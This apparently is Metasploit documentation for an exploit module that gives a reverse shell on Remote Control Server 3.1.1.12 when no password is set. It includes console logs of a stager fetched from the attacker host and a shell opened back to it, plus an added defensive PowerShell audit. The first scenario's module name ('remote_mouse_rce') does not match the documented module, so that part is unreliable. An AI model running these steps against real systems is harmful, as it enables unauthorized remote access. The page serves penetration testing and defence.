## Vulnerable Application

This module uses the protocol of the Remote Control Server, part of the Remote Control Collection by Steppschuh, to deploy a payload and run it from the server. The module will only deploy a payload if the server is set without a password (the default).

Tested against 3.1.1.12, current at the time of module writing.

Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/remote_control_collection_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Remote Mouse.

## Options

### PATH

The location to write the payload to. Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems.

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to `1`.

## Scenarios

### Remote Control Server 3.1.1.12 on Windows 10

```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 1.1.1.1:1978 - The target appears to be vulnerable.
Received handshake with version: 411
[*] 1.1.1.1:1978 - Connecting
[*] 1.1.1.1:1978 - Sending Windows key
[*] 1.1.1.1:1978 - Opening command prompt
[*] 1.1.1.1:1978 - Sending stager
[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 1.1.1.1
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
[*] 1.1.1.1:1978 - Server stopped.
[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Users\windows>whoami
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
```

### Remote Control Server 3.1.1.12 on Windows 10, with a password

Expected to fail.

```
resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_control_collection.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_control_collection.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_control_collection.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_control_collection_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Connecting and Sending Windows key
[*] Opening command prompt
[*] Sending stager
[*] Using URL: http://2.2.2.2:8080/
[*] Executing payload
[*] Server stopped.
[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
[*] Exploit completed, but no session was created
```
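
A host-side audit for the two artifacts visible in the scenarios above: a listener on TCP 1978 and a leftover executable in the payload directory. This is an added example, not part of the module or its documentation; the file-name pattern (modelled on the two names in the output) and the 7-day look-back window are assumptions.

```powershell
# Added example: audit a Windows host for the artifacts shown in the scenarios.
$Port      = 1978                                   # port seen in the module output
$Dirs      = @('C:\Windows\Temp', $env:TEMP) | Select-Object -Unique
$NameRegex = '^[A-Za-z0-9]{6,16}\.exe$'             # assumption: random alphanumeric name
$Since     = (Get-Date).AddDays(-7)                 # assumption: look-back window

# 1. Is anything listening on the server port, and which process owns it?
$listeners = Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue
foreach ($l in $listeners) {
    $proc = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Finding = 'Listener'
        Detail  = '{0}:{1} pid={2} image={3}' -f $l.LocalAddress, $l.LocalPort,
                  $l.OwningProcess, $proc.Path
    }
}
if (-not $listeners) { Write-Verbose "Nothing listening on TCP $Port" }

# 2. Recently created executables in the payload directory that match the
#    naming seen in the "manual cleanup" warnings.
foreach ($dir in $Dirs) {
    if (-not (Test-Path -LiteralPath $dir)) { continue }
    Get-ChildItem -LiteralPath $dir -Filter *.exe -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match $NameRegex -and $_.CreationTime -ge $Since } |
        ForEach-Object {
            # Signature status and hash give the responder something to triage on.
            $sig  = Get-AuthenticodeSignature -LiteralPath $_.FullName
            $hash = Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256
            [pscustomobject]@{
                Finding = 'TempExecutable'
                Detail  = '{0} created={1:u} signature={2} sha256={3}' -f $_.FullName,
                          $_.CreationTime, $sig.Status, $hash.Hash
            }
        }
}
```

A `Listener` finding is worth following up by confirming that the server has a password set, since the module only deploys a payload when it does not. Run the script elevated so that the owning process path and `C:\Windows\Temp` are readable.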